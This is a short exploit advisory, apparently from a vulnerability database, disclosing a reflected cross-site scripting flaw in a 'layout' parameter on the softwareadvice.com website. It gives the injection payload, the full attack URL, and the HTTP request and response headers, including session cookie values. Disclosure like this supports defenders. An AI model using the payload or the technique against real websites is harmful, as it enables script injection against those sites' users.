Software Advice 1.0 Cross Site Scripting

2018.05.31
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: [ Reflected XSS at Software Advice ] # Date: [27.05.2018] # Exploit Author: [Ismail Tasdelen] # Vendor Homepage: [https://www.softwareadvice.com/] # Software Link: [ Software Advice Website ] # Version: 1.0 # Tested on: Kali Linux # Reflected XSS Payload : '-confirm`Ismail Tasdelen`-' # HTTP REQUEST HEADER : Request URL: https://www.softwareadvice.com/hr/workable-profile/?layout=%27-confirm`Ismail%20Tasdelen`-%27 Request Method: GET Status Code: 200 Remote Address: 23.221.165.35:443 Referrer Policy: no-referrer-when-downgrade :authority: www.softwareadvice.com :method: GET :path: /hr/workable-profile/?layout=%27-confirm`Ismail%20Tasdelen`-%27 :scheme: https accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 accept-encoding: gzip, deflate, br accept-language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 cache-control: max-age=0 cookie: PHPSESSID=84ghfoei5qehtisf94lk187es6; optimizelyEndUserId=oeu1527439807853r0.3055516258919597; _ga=GA1.2.53898763.1527439811; _gid=GA1.2.242573448.1527439811; hasSeenCookiesConsent=1; __utma=24246072.53898763.1527439811.1527439812.1527439812.1; __utmc=24246072; __utmz=24246072.1527439812.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IR_gbd=softwareadvice.com; IR_PI=1527439811848.llloh2aehwq; lc_sso7520261=1527439812306; _gu=fc0f39ef-3375-48f4-8a23-f2bc31885a3a; __lc.visitor_id.7520261=S1527439814.38416b2f19; _gs=2.s(src=https://www.softwareadvice.com/hr/workable-profile/?layout=%27-confirm`Ismail%20Tasdelen`-%27)c[Desktop,Chrome,25:347:7992:,Windows,212.253.204.84]; __utmb=24246072.8.10.1527439812; _uetsid=_uetabcf556c; IR_8018=1527440320552%7C0%7C1527439811848; _gw=2.u[~0,~0,~0,~0,~0]v[~f5n0a,~8,~0]a() upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36 # HTTP RESPONSE HEADER : accept-ranges: bytes browser-cache: none cache-control: max-age=0, no-cache, no-store cache-type: default content-encoding: gzip content-length: 38319 content-type: text/html; charset=UTF-8 date: Sun, 27 May 2018 17:00:18 GMT expires: Sun, 27 May 2018 17:00:18 GMT front-end-https: on hosted: web24 p3p: CP="CAO PSA OUR" pragma: no-cache server: nginx status: 200 strict-transport-security: max-age=31536000 vary: Accept-Encoding x-varnish: 10849666 x-varnish-cache: pass x-varnish-ttl: 0 # Query String Parametres : layout: '-confirm`Ismail Tasdelen`-' # You want to follow my activity ? https://www.linkedin.com/in/ismailtasdelen https://github.com/ismailtasdelen https://twitter.com/ismailtsdln


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top